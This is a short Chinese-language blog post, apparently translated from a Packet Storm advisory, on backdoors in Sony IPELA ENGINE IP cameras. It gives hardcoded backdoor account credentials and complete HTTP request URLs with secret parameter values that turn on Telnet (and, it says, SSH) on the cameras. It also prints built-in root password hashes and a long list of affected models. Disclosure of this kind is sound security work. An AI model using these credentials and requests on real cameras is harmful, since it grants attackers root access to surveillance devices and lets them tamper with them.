AD

sony_IPELA_ENGINE_IP_Cameras_backdoor

   索尼的IPELA ENGINE网络摄像头被发现存在多个后门,可以导致攻击者获取到设备的root权限。


POC1:后门账户
   debug/popeyeConnection
    primana/primana

POC2:利用后门账号,开启TELNET/SSH
   开启TELNET: Gen5系列设备SNC-DH160 测试通过
    http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9
    http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk

   备注:在Gen6系列中,存在SSH服务,可以被开启。请求内容有些不同,为"himitunokagi" 字符串 (日语中为secret key)

POC3: 设备内置root账户
    root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras)
    root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras)

测试环境:
    SNC-DH160 version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip).
    Gen6 cameras V2.7.0 (snc-g6-series-v2-7-0.zip)


索尼sony确认受影响的产品:
   SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120,
SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520,
SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551

SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585,
SNC-ER585H, SNC-ZP550, SNC-ZR550

SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C

SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630,
SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC,
SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B,
SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635,
SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R,
SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600,
SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631,
SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L,
SNC-WR602CL

参考/翻译来源:https://packetstormsecurity.com/files/140051/Sony-IPELA-ENGINE-IP-Cameras-Backdoor-Accounts.html

评论

此博客中的热门博文

简单粗暴导出小米便签

我——终于一个人了

Ubiquiti_Networks_UniFi_Cloud_Key_authed_rce